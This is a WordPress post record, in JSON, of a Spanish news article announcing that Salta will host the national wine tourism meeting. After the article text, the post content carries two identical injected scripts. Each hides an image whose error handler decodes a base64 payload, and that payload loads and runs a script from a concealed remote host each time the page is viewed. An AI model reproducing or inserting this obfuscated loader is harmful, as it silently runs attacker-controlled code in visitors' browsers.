{"id":1465,"date":"2022-09-09T13:10:58","date_gmt":"2022-09-09T16:10:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1465"},"modified":"2025-08-14T00:35:47","modified_gmt":"2025-08-14T03:35:47","slug":"el-proximo-encuentro-nacional-de-turismo-del-vino-se-realizara-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1465","title":{"rendered":"El pr\u00f3ximo Encuentro Nacional de Turismo del Vino se realizar\u00e1 en Salta"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#c60a39\"><em>El evento reunir\u00e1 a referentes de todo el pa\u00eds para debatir sobre el presente y futuro del enoturismo. El lanzamiento lo realiz\u00f3 el ministro de Turismo de Salta, Mario Pe\u00f1a, junto a la secretaria de Promoci\u00f3n de la Naci\u00f3n, Yanina Mart\u00ednez.<\/em><\/h4>\n\n\n\n<p>Entre el 24 y el 26 de noviembre, Salta recibir\u00e1 a representantes provinciales en el marco del Encuentro Nacional de Turismo del Vino donde se analizar\u00e1n pol\u00edticas para el crecimiento del enoturismo. El lanzamiento se realiz\u00f3 en el predio de La Rural en Buenos Aires donde el ministro de Turismo y Deportes Mario Pe\u00f1a comparti\u00f3 el anuncio junto a la secretaria de Promoci\u00f3n de la Naci\u00f3n, Yanina Mart\u00ednez.<\/p>\n\n\n\n<p>El enoturismo en Salta, con la emblem\u00e1tica Ruta del Vino como estandarte representa uno de los productos tur\u00edsticos m\u00e1s importantes para la provincia por los municipios que atraviesa, los empleos que genera y la transversalidad relacion\u00e1ndose con la gastronom\u00eda y la cultura.<\/p>\n\n\n\n<p>En la presentaci\u00f3n estuvo tambi\u00e9n el presidente de Bodegas de Salta Roberto Thomann en representaci\u00f3n de los emprendimientos que cuentan con actividades destinadas a los miles de turistas.<\/p>\n\n\n\n<p>\u201cSer\u00e1 un placer recibir a todo el pa\u00eds en nuestra provincia para este encuentro nacional donde dialogaremos sobre pol\u00edticas p\u00fablicas relacionadas al enoturismo y su vinculaci\u00f3n con la cultura y gastronom\u00eda\u201d, se\u00f1al\u00f3 el ministro Pe\u00f1a, destacando que la Ruta del Vino en Salta a\u00fan tiene un potencial enorme de crecimiento.<\/p>\n\n\n\n<p>Este encuentro responde a dos objetivos trazados en el plan Liderar, por un lado el desarrollo de un producto ic\u00f3nico como la Ruta del Vino de Altura y por otro lado, consolidar a Salta como un destino l\u00edder en turismo de reuniones.<\/p>\n\n\n\n<p>El evento de noviembre, que coincidir\u00e1 con el D\u00eda del Vino Argentino, se dividir\u00e1 en una jornada de conferencias y exposiciones sobre pol\u00edticas orientadas a la actividad y en otra con visitas t\u00e9cnicas a emprendimientos enotur\u00edsticos.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El evento reunir\u00e1 a referentes de todo el pa\u00eds para debatir sobre el presente y futuro del enoturismo. El lanzamiento lo realiz\u00f3 el ministro de Turismo de Salta, Mario Pe\u00f1a, junto a la secretaria de Promoci\u00f3n de la Naci\u00f3n, Yanina Mart\u00ednez. Entre el 24 y el 26 de noviembre, Salta recibir\u00e1 a representantes provinciales en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1466,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,18],"tags":[],"class_list":{"0":"post-1465","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1465"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1465"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1465\/revisions"}],"predecessor-version":[{"id":7355,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1465\/revisions\/7355"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1466"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1465"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}